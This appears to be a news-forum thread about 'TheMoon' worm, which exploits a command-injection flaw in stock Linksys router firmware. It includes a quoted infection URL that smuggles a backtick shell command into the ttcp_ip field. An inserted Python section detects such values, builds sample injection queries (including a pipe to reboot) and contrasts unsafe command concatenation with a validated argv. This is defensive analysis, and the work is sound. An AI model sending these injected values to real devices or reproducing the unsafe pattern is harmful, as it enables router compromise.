Linksys Routers Exploited By "TheMoon"
UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"
Model Numbers of affected devices. (Score:5, Informative)
Re: That's impossible (Score:5, Informative)
Slow your roll there, not all Linksys run Linux. Most run VxWorks RTOS. Only the Linksys routers flashed with DD-WRT firmware run Linux for sure.
Re:That's impossible (Score:5, Informative)
Only affecting models not running Linux currently...
Re:Default firmware only? (Score:5, Informative)
The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd
It appears that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.
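The comment above describes the bug as the router's web UI handing the ttcp_ip parameter to a shell. As an added illustration, not code from the post or from any Linksys firmware, the Python below shows two defender-side pieces: a check that scans query strings for ttcp_ip values carrying shell metacharacters or option-looking text, and the contrast between concatenating that value into a command line and validating it as an IP address before building an argv list. The sample query strings are constructed (the payload after the backtick is a placeholder), and the ttcp flags and parameter limits are assumptions.

```python
import re
import ipaddress
from urllib.parse import parse_qs

# Constructed sample query strings in the shape the ISC write-up describes.
# The first is a benign ttcp request; the others carry shell metacharacters.
SAMPLE_QUERIES = [
    "submit_button=&change_action=&submit_type=&action=&commit=0"
    "&ttcp_num=2&ttcp_size=2&ttcp_ip=192.168.1.10",
    "submit_button=&change_action=&submit_type=&action=&commit=0"
    "&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp`",          # placeholder body
    "submit_button=&change_action=&submit_type=&action=&commit=0"
    "&ttcp_num=2&ttcp_size=2&ttcp_ip=10.0.0.5|reboot",
]

# Characters that only make sense if the value is going to be interpreted by a shell.
SHELL_META = re.compile(r"[`$;|&<>\n]")


def is_valid_host(value):
    """True if value parses as an IPv4 or IPv6 address (no hostnames, no options)."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def flag_query(query):
    """Return a reason string if the ttcp_ip value looks like injection, else None."""
    params = parse_qs(query, keep_blank_values=True)
    for value in params.get("ttcp_ip", []):
        if SHELL_META.search(value):
            return "shell metacharacters in ttcp_ip"
        if value.startswith("-"):
            return "option-looking ttcp_ip"
        if not is_valid_host(value):
            return "ttcp_ip is not an IP address"
    return None


def scan_queries(queries):
    """Run flag_query over a list of request query strings; return (index, reason) hits."""
    hits = []
    for i, q in enumerate(queries):
        reason = flag_query(q)
        if reason:
            hits.append((i, reason))
    return hits


def unsafe_command_line(ttcp_ip, ttcp_num, ttcp_size):
    """The defective pattern: user input spliced into a string meant for a shell.
    Returned as a string only; never pass something like this to a shell."""
    return "ttcp -t -n %s -l %s %s" % (ttcp_num, ttcp_size, ttcp_ip)


def build_ttcp_argv(ttcp_ip, ttcp_num, ttcp_size):
    """Hardened form: validate every field, then build an argv list for
    subprocess.run(argv) with shell=False, so no shell ever parses the input.
    Flag names and the numeric limits are assumptions for illustration."""
    if not is_valid_host(ttcp_ip):
        raise ValueError("ttcp_ip must be a literal IP address")
    num = int(ttcp_num)
    size = int(ttcp_size)
    if not (1 <= num <= 100) or not (1 <= size <= 65535):
        raise ValueError("ttcp_num/ttcp_size out of range")
    return ["ttcp", "-t", "-n", str(num), "-l", str(size), ttcp_ip]


if __name__ == "__main__":
    for idx, reason in scan_queries(SAMPLE_QUERIES):
        print("query %d flagged: %s" % (idx, reason))
    print(build_ttcp_argv("192.168.1.10", "2", "2"))
```

Because ttcp_ip is accepted only as a parsed IP address, a value that begins with "-" or contains a backtick never reaches command construction; the argv list form then removes the shell from the path entirely, which is the fix the comment's description of the bug points at.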
Actually Belkin bought them from Cisco (Score:5, Informative)
Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.
And Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... rather than fixing the firmware problem that requires the frequent reboots.
Re:Is dd-wrt affected? (Score:5, Informative)
No, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di... [sans.edu]
Re:That's impossible (Score:3, Informative)
As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."
I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?
Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.